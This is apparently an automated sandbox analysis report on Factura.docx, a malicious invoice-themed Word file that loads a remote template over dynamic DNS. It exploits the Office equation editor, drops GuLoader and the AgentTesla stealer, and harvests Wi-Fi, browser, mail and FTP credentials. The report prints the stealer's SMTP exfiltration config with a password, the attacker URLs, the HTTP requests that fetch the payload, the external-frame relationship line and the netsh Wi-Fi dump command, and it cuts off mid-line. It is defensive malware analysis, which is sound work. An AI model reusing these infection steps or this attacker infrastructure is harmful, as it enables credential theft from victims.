Analysis Report Factura.docx

Overview

General Information

Sample Name: Factura.docx
MD5: 42dbae807d20dbacc52b4530f01fec9a
SHA1: 264d3851de194ca25119fa2ba788d1d1f81d1fad
SHA256: b18f96dd5b69bc677dadaadf2c1b6587412ba42a10bc6217367a12c6df5e087d

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains an external reference to another document
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: RegAsm connects to smtp port
Yara detected AgentTesla
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Hides threads from debuggers
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Potential document exploit detected (performs DNS queries with low reputation score)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses dynamic DNS services
Uses netsh to modify the Windows network and firewall settings
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7
  • WINWORD.EXE (PID: 3816 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
  • EQNEDT32.EXE (PID: 2120 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 484 cmdline: 'C:\Users\user\AppData\Roaming\vbc.exe' MD5: 3EF86B394F40F47FE71A8F50DC6C1C84)
      • RegAsm.exe (PID: 2316 cmdline: 'C:\Users\user\AppData\Roaming\vbc.exe' MD5: 246BB0F8D68A463FD17C235DEB5491C0)
        • netsh.exe (PID: 2368 cmdline: 'netsh' wlan show profile MD5: 784A50A6A09C25F011C3143DDD68E729)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "4Jry3HE", "URL: ": "http://eYifB0NwlB.net", "To: ": "sergiofile12@gmail.com", "ByHost: ": "mail.ovidiogarcia.com:587", "Password: ": "I2sy8obJ7f8T0", "From: ": "alberto@ovidiogarcia.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.2606953485.00070000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
0000000A.00000002.2611648109.1F4B0000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: RegAsm.exe PID: 2316 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: RegAsm.exe PID: 2316 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: RegAsm.exe PID: 2316 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Capture Wi-Fi password
Source: Process started; Author: Joe Security; Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 2316, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 2368
Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vbc.exe, NewProcessName: C:\Users\user\AppData\Roaming\vbc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2120, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , ProcessId: 484
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ProcessId: 2120, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exe
Sigma detected: RegAsm connects to smtp port
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 185.92.245.159, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 2316, Protocol: tcp, SourceIp: 192.168.2.2, SourceIsIpv6: false, SourcePort: 49169

Signature Overview

AV Detection:

Found malware configuration
Source: RegAsm.exe.2316.10.memstr; Malware Configuration Extractor: Agenttesla {"Username: ": "4Jry3HE", "URL: ": "http://eYifB0NwlB.net", "To: ": "sergiofile12@gmail.com", "ByHost: ": "mail.ovidiogarcia.com:587", "Password: ": "I2sy8obJ7f8T0", "From: ": "alberto@ovidiogarcia.com"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exe; Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Roaming\vbc.exe; Virustotal: Detection: 20%
Multi AV Scanner detection for submitted file
Source: Factura.docx; Virustotal: Detection: 36%
Source: Factura.docx; Metadefender: Detection: 15%
Source: Factura.docx; ReversingLabs: Detection: 29%

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe; Code function: 10_2_1E2932E2 CryptFindOIDInfo,10_2_1E2932E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe; Code function: 10_2_1E2932A9 CryptFindOIDInfo,10_2_1E2932A9

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries with low reputation score)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; DNS query: name: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe; Code function: 4x nop then cld 10_2_00072636
Source: global traffic; DNS query: name: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
Source: global traffic; TCP traffic: 192.168.2.2:49167 -> 216.58.207.33:443
Source: global traffic; TCP traffic: 192.168.2.2:49159 -> 103.99.1.165:80

Networking:

Uses dynamic DNS services
Source: unknown; DNS query: name: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
Source: global traffic; TCP traffic: 192.168.2.2:49169 -> 185.92.245.159:587
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 09 Jun 2020 19:42:54 GMT
  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
  Last-Modified: Tue, 09 Jun 2020 11:36:44 GMT
  ETag: "12000-5a7a5244dcc22"
  Accept-Ranges: bytes
  Content-Length: 73728
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: Joe Sandbox View; IP Address: 216.58.207.33 216.58.207.33
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic; HTTP traffic detected:
  GET /document/invoice_111334.doc HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  Accept-Encoding: gzip, deflate
  Host: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /mkpk2doc/regasm.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
  Connection: Keep-Alive
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe; Code function: 10_2_0097A09A recv,10_2_0097A09A
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
Source: RegAsm.exe, 0000000A.00000002.2611648109.1F4B0000.00000004.00000001.sdmp; String found in binary or memory: http://eYifB0NwlB.net
Source: document on mkpksb2stdywhatsapphappentomaninliveso.duckdns.org.url.0.dr; String found in binary or memory: http://mkpksb2stdywhatsapphappentomaninliveso.duckdns.org/document/
Source: invoice_111334.doc.url.0.dr; String found in binary or memory: http://mkpksb2stdywhatsapphappentomaninliveso.duckdns.org/document/invoice_111334.doc
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
            Source: RegAsm.exe, 0000000A.00000003.1231217618.21E89000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
            Source: RegAsm.exe, 0000000A.00000003.1231194838.21E68000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
            Source: RegAsm.exe, 0000000A.00000003.1230976244.1EA68000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
            Source: RegAsm.exe, 0000000A.00000003.1231194838.21E68000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
            Source: RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3emi468v
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-9g-docs.googleusercontent.com/mi
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-9g-docs.googleusercontent.com/s
            Source: RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/t
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15FWIGIVEMLCjev6bHz-C_jmPxVG59Qdm
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
            Source: RegAsm.exe, 0000000A.00000002.2612025443.1F6A3000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
            Source: RegAsm.exe, 0000000A.00000002.2612573630.21F0F000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

            System Summary:

            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\vbc.exe
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_00072D93 NtSetInformationThread, 10_2_00072D93
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_000729DC NtProtectVirtualMemory, 10_2_000729DC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_00072DAF NtSetInformationThread, 10_2_00072DAF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_00072DE1 NtSetInformationThread, 10_2_00072DE1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_0097B362 NtQuerySystemInformation, 10_2_0097B362
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_0097B331 NtQuerySystemInformation, 10_2_0097B331
            Source: regasm[1].exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: vbc.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOCX@8/27@14/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_0097B1E6 AdjustTokenPrivileges, 10_2_0097B1E6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 10_2_0097B1AF AdjustTokenPrivileges, 10_2_0097B1AF
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$actura.docx
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD362.tmp
            Source: C:\Users\user\AppData\Roaming\vbc.exe Section loaded: C:\Windows\System32\msvbvm60.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
            Source: C:\Users\user\AppData\Roaming\vbc.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Factura.docx Virustotal: Detection: 36%
            Source: Factura.docx Metadefender: Detection: 15%
            Source: Factura.docx ReversingLabs: Detection: 29%
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknown Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknown Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
            Source: unknown Process created: C:\Windows\System32\netsh.exe 'netsh' wlan show profile
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
            Source: C:\Users\user\AppData\Roaming\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\System32\netsh.exe 'netsh' wlan show profile
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
            Source: Binary string: mscorrc.pdb source: RegAsm.exe, 0000000A.00000002.2610434139.1E2C0000.00000002.00000001.sdmp

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match File source: 0000000A.00000002.2606953485.00070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2316, type: MEMORY

            Persistence and Installation Behavior:

            Contains an external reference to another document
            Source: webSettings.xml.rels Binary or memory string: <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://mkpksb2stdywhatsapphappentomaninliveso.duckdns.org/document/invoice_111334.doc" TargetMode="External"/>
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\vbc.exe
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exe

            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft